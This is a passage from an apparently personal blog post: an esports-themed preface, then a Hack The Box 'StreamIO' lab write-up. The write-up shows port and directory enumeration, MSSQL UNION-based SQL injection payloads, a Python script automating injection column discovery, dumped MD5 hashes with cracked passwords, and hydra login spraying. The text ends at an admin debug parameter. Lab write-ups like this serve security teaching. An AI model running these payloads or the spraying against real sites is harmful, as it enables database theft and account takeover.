## Preface

Before the end of September this year I received several offers I was genuinely happy with, from both big-tech security teams and security vendors. Looking back, the second half of the year was fairly full: interning, preparing for the autumn recruiting season, and digging into the security topics I cared about, all at the same time. A month after accepting an offer I handed my resignation to the lab director. On my last evening I took a walk around Wangjing SOHO and suddenly realised how hard it was to leave the place.

My original thought was that going back to school would be more relaxed and free, that I could study whatever I wanted. But in the month or so since returning I have been slacking off almost every day, either watching Bilibili or playing games, with no will to study at all; every plan I had made fell through. That lasted until a few days ago, when I watched Faker win the championship.

I started following League of Legends esports around S6. By the time I watched my first match, Faker was already the undisputed GOAT. My first impression was of his raw individual skill; just seeing him standing in mid lane made your spine tingle. But I did not become a Faker fan in S6, when he became a three-time world champion. That happened last year, in the Worlds semifinal between T1 and JDG. I remember it was game four, and Faker's Azir was outstanding in that game. One moment that stuck with me was Faker flashing over a wall in JDG's blue-side jungle to cut across the map, then ulting two players back; from that point the series slowly slipped away from JDG. But that play only shows that Faker is decisive and willing to gamble on an opening. What really moved me was the later teamfight in mid lane, where Faker's shuffle plus ultimate pushed four enemies at once. When the fight ended the camera cut to a close-up of Faker, and I saw a tear in his smiling eyes.

In that moment I was won over by Faker's personal charisma. Many years had passed since Faker first stepped on stage, yet his love for the game had never faded. Even with many people saying he was old and could no longer match the mechanics of younger players, he kept earning his place on the stage through his own effort and kept performing. So even when T1 lost last year's final to DRX, my admiration did not drop one bit, because I believed someone like him was bound to win another title.

Fate, though, seems to enjoy toying with people: before it lets someone succeed, it first makes them suffer. After that Worlds runner-up finish, fate handed the team two more second places, and T1 was jokingly called the "grand slam of silver" team. In July this year Faker sat out for a month because of a hand injury, and in that month T1 won one of eight best-of-threes. Honestly, when I saw that record I lost all faith in T1 winning another title this year. Yet when Faker returned he led his four teammates to the summer final, and they finished second again... Compared with the earlier results a second place was already respectable, but I still did not think Faker would win this year. If a year of sweeping everything had not produced a title, why would this one? T1's early Worlds matches seemed to confirm that: they nearly threw their first game against TL, and lost again when they met Gen.G. And with exactly that pessimistic mindset I watched Faker and his four teammates fight through the bracket and win Worlds, including an 11-1 game record against LPL opponents.

Seeing Faker win his fourth title, I was genuinely impressed and happy, but the happiness also made me think about myself. Over this period I kept asking whether I could be like Faker and keep at the work I love day after day for more than a decade. Faker's story since S6 seems to say one thing: only by persisting at something for ten years does a dream have a chance of coming true. Having understood that, I started to pull myself together. I want to be like Faker: stay humble, and give everything to the things I love.

So recently I have found my motivation to study again, and these past days I picked a few HTB machines to get my hands back in shape. The rest of this post records the ideas and methods I used on the StreamIO machine, in as much detail as I can manage.
## GetShell

Because the lab is fairly complex, to keep the connection as stable as possible you can connect the VPN through a proxy server. Add the following to the .ovpn file:
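The fragment itself did not survive in the text above; the following is an added reconstruction from the proxy address and port given in the next paragraph, not the author's own file. The `http-proxy` directive is the standard OpenVPN one; `proto tcp` is shown only because the directive refuses to work over UDP, and HTB's TCP connection pack already contains it.

```conf
# OpenVPN profile additions (added example; replace the address and port with your own proxy)
proto tcp                          # http-proxy is TCP-only: use the TCP variant of the HTB .ovpn
http-proxy 192.168.135.1 7890      # host and port of the HTTP CONNECT proxy
```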
Here 192.168.135.1 is the IP of my proxy server and 7890 its port; change them to your own. Note that OpenVPN's http-proxy option only works over TCP, so the profile must use proto tcp (use the TCP version of the HTB connection pack). Connecting to the VPN through the proxy is reasonably fast:

Now on to the box. First run `nmap -sT -p- --min-rate 5000 -oA nmapscan/ports 10.10.11.158` to find the open ports:
```
Nmap scan report for 10.10.11.158
Host is up (0.28s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49705/tcp open  unknown
51260/tcp open  unknown
```
Next, a detailed scan of exactly those ports:
```
nmap -sT -sV -sC -O -p 53,80,88,135,139,389,443,445,464,593,636,5985,9389,49667,49673,49674,49705,51260 --min-rate 5000 -oA nmapscan/details 10.10.11.158
Nmap scan report for 10.10.11.158
Host is up (0.38s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-08 12:44:22Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2023-12-08T12:46:06+00:00; +7h00m00s from scanner time.
|_http-title: Not Found
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49667/tcp open  msrpc        Microsoft Windows RPC
49673/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc        Microsoft Windows RPC
49705/tcp open  msrpc        Microsoft Windows RPC
51260/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
|   date: 2023-12-08T12:45:31
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```
The scan shows this is a domain controller: Kerberos, LDAP, DNS and ADWS are all listening, and the service info reports the host name DC in the domain streamIO.htb. The certificate SAN gives two host names, so add streamio.htb and watch.streamio.htb to /etc/hosts. Since 139 and 445 are open, try an anonymous SMB connection:

Running `crackmapexec smb 10.10.11.158` fingerprints the host (name DC, domain streamIO.htb), so add dc.streamio.htb to hosts as well:

Next, enumerate subdomains:
```
$ wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "HOST: FUZZ.streamio.htb" -u https://streamio.htb/ --hw 24 --hc 400
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/
Total requests: 19966

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000002268:   200        78 L     245 W      2829 Ch     "watch - watch"

Total time: 240.1962
Processed Requests: 19966
Filtered Requests: 19965
Requests/sec.: 83.12368
```
Nothing new: with the default 24-word response hidden (`--hw 24`), the only hit is watch.streamio.htb, which we already had from the certificate. Now let's look at the web services on this host:

Port 80 is the stock IIS welcome page, nothing of interest. Port 443 serves https://streamio.htb:

Registering works (it reports success), but logging in with the new account fails, and sqlmap finds nothing. Checking the other pages turns up nothing suspicious either. Next, https://watch.streamio.htb/:

Nothing exploitable on inspection, so let's brute-force directories:
```
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ https://streamio.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔓  Insecure              │ true
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      151c https://streamio.htb/images => https://streamio.htb/images/
301      GET        2l       10w      150c https://streamio.htb/admin => https://streamio.htb/admin/
301      GET        2l       10w      147c https://streamio.htb/js => https://streamio.htb/js/
301      GET        2l       10w      148c https://streamio.htb/css => https://streamio.htb/css/
200      GET        2l     1276w    88145c https://streamio.htb/js/jquery-3.4.1.min.js
200      GET      231l      571w     7825c https://streamio.htb/about.php
200      GET      192l     1006w    82931c https://streamio.htb/images/icon.png
200      GET      395l      915w    13497c https://streamio.htb/index.php
200      GET      101l      173w     1663c https://streamio.htb/css/responsive.css
200      GET      111l      269w     4145c https://streamio.htb/login.php
200      GET        5l      374w    21257c https://streamio.htb/js/popper.min.js
200      GET       51l      213w    19329c https://streamio.htb/images/client.jpg
200      GET      863l     1698w    16966c https://streamio.htb/css/style.css
200      GET      206l      430w     6434c https://streamio.htb/contact.php
200      GET      913l     5479w   420833c https://streamio.htb/images/about-img.png
302      GET        0l        0w        0c https://streamio.htb/logout.php => https://streamio.htb/
200      GET      367l     1995w   166220c https://streamio.htb/images/contact-img.png
200      GET      395l      915w    13497c https://streamio.htb/
200      GET      121l      291w     4500c https://streamio.htb/register.php
200      GET      191l      253w     3120c https://streamio.htb/css/login.css
301      GET        2l       10w      157c https://streamio.htb/admin/images => https://streamio.htb/admin/images/
301      GET        2l       10w      154c https://streamio.htb/admin/css => https://streamio.htb/admin/css/
301      GET        2l       10w      153c https://streamio.htb/admin/js => https://streamio.htb/admin/js/
200      GET      274l     1677w   150222c https://streamio.htb/images/barry.png
200      GET     2059l    12754w  1028337c https://streamio.htb/images/samantha.png
200      GET     1753l    10007w   871140c https://streamio.htb/images/oliver.png
301      GET        2l       10w      150c https://streamio.htb/fonts => https://streamio.htb/fonts/
403      GET        1l        1w       18c https://streamio.htb/admin/index.php
301      GET        2l       10w      156c https://streamio.htb/admin/fonts => https://streamio.htb/admin/fonts/
200      GET        2l        6w       58c https://streamio.htb/admin/master.php
404      GET       40l      156w     1888c https://streamio.htb/con
404      GET       40l      156w     1894c https://streamio.htb/admin/con
404      GET       40l      156w     1895c https://streamio.htb/images/con
404      GET       40l      156w     1891c https://streamio.htb/js/con
404      GET       40l      156w     1892c https://streamio.htb/css/con
404      GET       40l      156w     1901c https://streamio.htb/admin/images/con
404      GET       40l      156w     1898c https://streamio.htb/admin/css/con
404      GET       40l      156w     1897c https://streamio.htb/admin/js/con
404      GET       40l      156w     1894c https://streamio.htb/fonts/con
404      GET       40l      156w     1900c https://streamio.htb/admin/fonts/con
404      GET       40l      156w     1888c https://streamio.htb/aux
404      GET       40l      156w     1894c https://streamio.htb/admin/aux
404      GET       40l      156w     1895c https://streamio.htb/images/aux
404      GET       40l      156w     1891c https://streamio.htb/js/aux
404      GET       40l      156w     1892c https://streamio.htb/css/aux
404      GET       40l      156w     1901c https://streamio.htb/admin/images/aux
404      GET       40l      156w     1898c https://streamio.htb/admin/css/aux
404      GET       40l      156w     1897c https://streamio.htb/admin/js/aux
404      GET       40l      156w     1894c https://streamio.htb/fonts/aux
404      GET       40l      156w     1900c https://streamio.htb/admin/fonts/aux
400      GET        6l       26w      324c https://streamio.htb/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/admin/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/images/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/admin/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/js/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/css/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/images/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/css/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/js/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/admin/images/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/admin/css/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/admin/js/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/admin/images/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/admin/css/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/admin/js/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/fonts/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/fonts/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/admin/fonts/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/admin/fonts/error%1F_log.php
404      GET       40l      156w     1888c https://streamio.htb/prn
404      GET       40l      156w     1894c https://streamio.htb/admin/prn
404      GET       40l      156w     1895c https://streamio.htb/images/prn
404      GET       40l      156w     1891c https://streamio.htb/js/prn
404      GET       40l      156w     1892c https://streamio.htb/css/prn
404      GET       40l      156w     1901c https://streamio.htb/admin/images/prn
404      GET       40l      156w     1898c https://streamio.htb/admin/css/prn
404      GET       40l      156w     1897c https://streamio.htb/admin/js/prn
404      GET       40l      156w     1894c https://streamio.htb/fonts/prn
404      GET       40l      156w     1900c https://streamio.htb/admin/fonts/prn
```
There is an /admin directory, which returns 403 Forbidden when accessed directly:

The results also include https://streamio.htb/admin/master.php; visiting it:

It answers "Only accessable through includes", so some other page must include files, i.e. a local file inclusion is likely somewhere. The rest of this vhost yields nothing, so let's brute-force the watch.streamio.htb vhost as well:
```
$ feroxbuster -u https://watch.streamio.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ https://watch.streamio.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔓  Insecure              │ true
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      136l      295w    22042c https://watch.streamio.htb/static/logo.png
200      GET      192l     1006w    82931c https://watch.streamio.htb/static/icon.png
200      GET       72l      112w      875c https://watch.streamio.htb/static/css/index.css
200      GET       78l      245w     2829c https://watch.streamio.htb/
200      GET       25l       34w      247c https://watch.streamio.htb/static/css/search.css
200      GET    10837l    20418w   195704c https://watch.streamio.htb/static/css/bootstrap.css
200      GET     7193l    19558w   253905c https://watch.streamio.htb/search.php
301      GET        2l       10w      161c https://watch.streamio.htb/static/css => https://watch.streamio.htb/static/css/
403      GET       29l       92w     1233c https://watch.streamio.htb/static/
301      GET        2l       10w      160c https://watch.streamio.htb/static/js => https://watch.streamio.htb/static/js/
301      GET        2l       10w      157c https://watch.streamio.htb/static => https://watch.streamio.htb/static/
403      GET       29l       92w     1233c https://watch.streamio.htb/static/css/
200      GET       78l      245w     2829c https://watch.streamio.htb/index.php
404      GET       40l      156w     1888c https://watch.streamio.htb/con
404      GET       40l      156w     1895c https://watch.streamio.htb/static/con
404      GET       40l      156w     1899c https://watch.streamio.htb/static/css/con
404      GET       40l      156w     1898c https://watch.streamio.htb/static/js/con
200      GET       20l       47w      677c https://watch.streamio.htb/blocked.php
404      GET       40l      156w     1888c https://watch.streamio.htb/aux
404      GET       40l      156w     1895c https://watch.streamio.htb/static/aux
404      GET       40l      156w     1899c https://watch.streamio.htb/static/css/aux
404      GET       40l      156w     1898c https://watch.streamio.htb/static/js/aux
400      GET        6l       26w      324c https://watch.streamio.htb/error%1F_log
400      GET        6l       26w      324c https://watch.streamio.htb/error%1F_log.php
400      GET        6l       26w      324c https://watch.streamio.htb/static/error%1F_log
400      GET        6l       26w      324c https://watch.streamio.htb/static/css/error%1F_log
400      GET        6l       26w      324c https://watch.streamio.htb/static/error%1F_log.php
400      GET        6l       26w      324c https://watch.streamio.htb/static/css/error%1F_log.php
400      GET        6l       26w      324c https://watch.streamio.htb/static/js/error%1F_log
400      GET        6l       26w      324c https://watch.streamio.htb/static/js/error%1F_log.php
404      GET       40l      156w     1888c https://watch.streamio.htb/prn
404      GET       40l      156w     1895c https://watch.streamio.htb/static/prn
404      GET       40l      156w     1899c https://watch.streamio.htb/static/css/prn
404      GET       40l      156w     1898c https://watch.streamio.htb/static/js/prn
```
This finds https://watch.streamio.htb/search.php and https://watch.streamio.htb/blocked.php. /search.php is a search form, which almost always means SQL injection is worth testing:

/blocked.php looks like this:

It warns that suspicious behaviour gets the client blocked for 5 minutes, so payloads should be sent sparingly rather than sprayed. Manual injection on /search.php first: `1' and 1=1-- -` and `1' and 1=2-- -` return different results, while `1' and 1=1-- -` and `1' and 2=2-- -` return the same. That is a clear boolean-based blind injection. Sending `1' and (select count(*) from sysobjects)>0-- -` returns the normal page, and since sysobjects is a SQL Server system view that identifies the backend as MSSQL. I initially found xp_cmdshell enabled and wanted to run commands through it, but our login is not sysadmin, so that path is closed.

ORDER BY is filtered, so the column count has to be found with UNION SELECT instead: keep adding columns to the UNION until the query stops failing. That gives 6 columns, with columns 2 and 3 reflected in the page:
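The two manual steps just described (find the column count without ORDER BY, then find which columns are reflected) automated in Python, as an added example that is not part of the original writeup. It goes slightly beyond the page's payloads by using NULL rather than 1,2,3,... as the filler, so that a wrong guess fails only because of the column count and never because of an int/varchar clash, and by probing one marker column per request. The `probe` callback, the `fake_probe` stand-in for search.php, and the `q` POST parameter and URL in the `__main__` block are assumptions; the response-parsing helper handles the FOR XML PATH output seen below whether the page returns the tags raw or HTML-escaped.

```python
import html
import re
import time
from typing import Callable, Dict, List, Optional

Probe = Callable[[str], str]  # injected search term -> response body


def union_payload(n: int, values: Optional[Dict[int, str]] = None) -> str:
    """Build `000' union select ...-- -` with n columns.

    NULL is the filler because it is compatible with every column type; `values`
    overrides chosen columns (1-based) with an expression such as "'marker'" or
    "(select @@version)". The leading 000' makes the original query match nothing.
    """
    values = values or {}
    cols = [values.get(i, "NULL") for i in range(1, n + 1)]
    return "000' union select " + ",".join(cols) + "-- -"


def find_column_count(probe: Probe, baseline: str, max_cols: int = 30,
                      delay: float = 0.0) -> Optional[int]:
    """Return the first column count for which the UNION no longer errors out.

    `baseline` is the response to a harmless, non-matching term. With a wrong
    column count SQL Server rejects the whole statement and the page renders no
    rows, so it looks exactly like the baseline; the first n that changes the page
    is the real count. `delay` paces requests because search.php blocks
    "suspicious" clients for five minutes.
    """
    for n in range(1, max_cols + 1):
        if probe(union_payload(n)) != baseline:
            return n
        time.sleep(delay)
    return None


def find_echo_columns(probe: Probe, n: int, delay: float = 0.0) -> List[int]:
    """Put a unique string marker in one column at a time and report which
    columns are reflected in the page (the usable output slots)."""
    echoed = []
    for i in range(1, n + 1):
        marker = f"qq{i}qq"
        if marker in probe(union_payload(n, {i: f"'{marker}'"})):
            echoed.append(i)
        time.sleep(delay)
    return echoed


def parse_xml_rows(body: str, tag: str) -> List[str]:
    """Pull <tag>...</tag> values out of FOR XML PATH output, raw or HTML-escaped."""
    return re.findall(rf"<{tag}>(.*?)</{tag}>", html.unescape(body))


def fake_probe(term: str) -> str:
    """Constructed stand-in for search.php: a 6-column table whose columns 2 and 3
    are rendered. Exists only so the functions above can be exercised offline."""
    m = re.fullmatch(r"000' union select (.*)-- -", term)
    if not m:
        return "<p>no results</p>"
    cols = m.group(1).split(",")
    if len(cols) != 6:
        return "<p>no results</p>"          # SQL error -> nothing rendered
    shown = ["" if c == "NULL" else c.strip("'") for c in cols]
    return f"<p>no results</p><div>{shown[1]}</div><div>{shown[2]}</div>"


if __name__ == "__main__":
    import requests  # assumption: search.php takes the term in a POST field named "q"

    def live_probe(term: str) -> str:
        return requests.post("https://watch.streamio.htb/search.php",
                             data={"q": term}, verify=False, timeout=10).text

    base = live_probe("000")
    n = find_column_count(live_probe, base, delay=1.0)
    if n is None:
        raise SystemExit("no column count found")
    print("columns:", n, "reflected:", find_echo_columns(live_probe, n, delay=1.0))
```

With the column count and reflected slots known, the `values` argument is where the `(select ... for xml path)` subqueries used below go, and `parse_xml_rows` turns the `<row><name>...</name></row>` text back into a list.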
Now extract data through the reflected column:
```
# Version
000' union select 1,(select @@version),3,4,5,6-- -
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0

# Current database
000' union select 1,(select db_name()),3,4,5,6-- -
STREAMIO

# All databases
000' union select 1,(select name from master..sysdatabases for xml path),3,4,5,6-- -
<row><name>master</name></row><row><name>tempdb</name></row><row><name>model</name></row><row><name>msdb</name></row><row><name>STREAMIO</name></row><row><name>streamio_backup</name></row>

# Tables
000' union select 1,(select name from STREAMIO..sysobjects where xtype='u' for xml path),3,4,5,6-- -
<row><name>movies</name></row><row><name>users</name></row>

# Columns of the users table
000' union select 1,(select name from STREAMIO..syscolumns where id=(select max(id) from STREAMIO..sysobjects where xtype='u' and name='users') for xml path),3,4,5,6-- -
<row><name>id</name></row><row><name>is_staff</name></row><row><name>password</name></row><row><name>username</name></row>

# username and password
000' union select 1,(select username,password from STREAMIO..users for xml path),3,4,5,6-- -
James c660060492d9edcaa8332d89c99c9239 Theodore 925e5408ecb67aea449373d668b7359e Samantha 083ffae904143c4796e464dac33c1f7d Lauren 08344b85b329d7efd611b7a7743e8a09 William d62be0dc82071bccc1322d64ec5b6c51 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5 Robert f03b910e2bd0313a23fdd7575f34a694 Thane 3577c47eb1e12c8ba021611e1280753c Carmon 35394484d89fcfdb3c5e447fe749d213 Barry 54c88b2dbd7b1a84012fabc1a4c73415 Oliver fd78db29173a5cf701bd69027cb9bf6b Michelle b83439b16f844bd6ffe35c02fe21b3c0 Gloria 0cfaaaafb559f081df2befbe66686de0 Victoria b22abb47a02b52d5dfa27fb0b534f693 Alexendra 1c2b3d8270321140e5153f6637d3ee53 Baxter 22ee218331afd081b0dcd8115284bae3 Clara ef8f3d30a856cf166fb8215aca93e9ff Barbra 3961548825e3e21df5646cafe11c6c76 Lenord ee0b8a0937abd60c2882eacb2f8dc49f Austin 0049ac57646627b8d7aeaccf8b6a936f Garfield 8097cedd612cc37c29db152b6e9edbd3 Juliette 6dcd87740abb64edfa36d170f0d5450d Victor bf55e15b119860a6e6b5a164377da719 Lucifer 7df45a9e3de3863807c026ba48e55fb3 Bruno 2a4e2cf22dd8fcb45adcb91be1e22ae8 Diablo ec33265e5fc8c2f1b0c137bb7b3632b5 Robin dc332fb5576e9631c9dae83f194f8e70 Stan 384463526d288edcc95fc3701e523bc7 yoshihide b779ba15cedfd22a023c4d8bcf5f2332 admin 665a50ac9eaa781e4f7f04199db97a11
```
That gives a batch of password hashes. hash-identifier classifies them as MD5 (32 hex characters, unsalted), which is hashcat mode 0.

Before cracking, the data needs some shaping: usernames in one file, hashes in another, and a username:hash file for hashcat's `--username` mode. A small script does that:
```python
# Split the "user hash user hash ..." text from the UNION dump into three files:
# usernames, hashes, and user:hash pairs for hashcat --username.
dump = (
    "James c660060492d9edcaa8332d89c99c9239 Theodore 925e5408ecb67aea449373d668b7359e "
    "Samantha 083ffae904143c4796e464dac33c1f7d Lauren 08344b85b329d7efd611b7a7743e8a09 "
    "William d62be0dc82071bccc1322d64ec5b6c51 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5 "
    "Robert f03b910e2bd0313a23fdd7575f34a694 Thane 3577c47eb1e12c8ba021611e1280753c "
    "Carmon 35394484d89fcfdb3c5e447fe749d213 Barry 54c88b2dbd7b1a84012fabc1a4c73415 "
    "Oliver fd78db29173a5cf701bd69027cb9bf6b Michelle b83439b16f844bd6ffe35c02fe21b3c0 "
    "Gloria 0cfaaaafb559f081df2befbe66686de0 Victoria b22abb47a02b52d5dfa27fb0b534f693 "
    "Alexendra 1c2b3d8270321140e5153f6637d3ee53 Baxter 22ee218331afd081b0dcd8115284bae3 "
    "Clara ef8f3d30a856cf166fb8215aca93e9ff Barbra 3961548825e3e21df5646cafe11c6c76 "
    "Lenord ee0b8a0937abd60c2882eacb2f8dc49f Austin 0049ac57646627b8d7aeaccf8b6a936f "
    "Garfield 8097cedd612cc37c29db152b6e9edbd3 Juliette 6dcd87740abb64edfa36d170f0d5450d "
    "Victor bf55e15b119860a6e6b5a164377da719 Lucifer 7df45a9e3de3863807c026ba48e55fb3 "
    "Bruno 2a4e2cf22dd8fcb45adcb91be1e22ae8 Diablo ec33265e5fc8c2f1b0c137bb7b3632b5 "
    "Robin dc332fb5576e9631c9dae83f194f8e70 Stan 384463526d288edcc95fc3701e523bc7 "
    "yoshihide b779ba15cedfd22a023c4d8bcf5f2332 admin 665a50ac9eaa781e4f7f04199db97a11"
)

tokens = dump.split()
pairs = list(zip(tokens[0::2], tokens[1::2]))   # (username, md5) per user

# "w" rather than "a": re-running the script must not duplicate lines in the lists
with open("username", "w") as f_user, open("password", "w") as f_pass, open("userpass", "w") as f_uap:
    for user, md5 in pairs:
        f_user.write(user + "\n")
        f_pass.write(md5 + "\n")
        f_uap.write(f"{user}:{md5}\n")
```
Then crack the hashes with hashcat (mode 0, rockyou); the cracked entries, shown with `--show`, are:
```
Lauren:08344b85b329d7efd611b7a7743e8a09:
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Thane:3577c47eb1e12c8ba021611e1280753c:highschoolmusical
Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
Michelle:b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
Victoria:b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd
```
Process this result the same way: usernames in one file, cracked passwords in another, and username:password pairs for spraying.
```bash
# --show only prints what an earlier cracking run (the same command without --show)
# stored in the potfile; with --username the output format is user:hash:plaintext
hashcat userpass /usr/share/wordlists/rockyou.txt --username -m 0 --show > tmp
awk -F: '{print $1}' tmp > cracked_username
awk -F: '{print $3}' tmp > cracked_password
awk -F: -v OFS=":" '{print $1,$3}' tmp > cracked_userpass
```
Since this is the users table of the STREAMIO database, these credentials presumably belong to the https://streamio.htb login. A few pairs tried by hand did not work, so spray the whole list:
```
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-10 11:35:12
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries, ~1 try per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:Failed
[443][http-post-form] host: streamio.htb   login: yoshihide   password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-10 11:35:14
```
That yields one working pair: yoshihide:66boysandgirls.. . Log in with it and visit the /admin directory found earlier:

It is an admin panel. Different values of a GET parameter lead to different pages:

Setting any of those parameters to master.php produces nothing, though. So let's fuzz the parameter name instead, to see whether a hidden page exists; the results:
```
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/admin/?FUZZ=
Total requests: 6453

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001575:   200        49 L     137 W      1712 Ch     "debug"
000003530:   200        10790 L  25878 W    320235 Ch   "movie"
000005450:   200        398 L    916 W      12484 Ch    "staff"
000006133:   200        62 L     160 W      2073 Ch     "user"

Total time: 76.33917
Processed Requests: 6453
Filtered Requests: 6449
Requests/sec.: 84.53064
```
Besides the three known ones there is a debug parameter; visiting it:

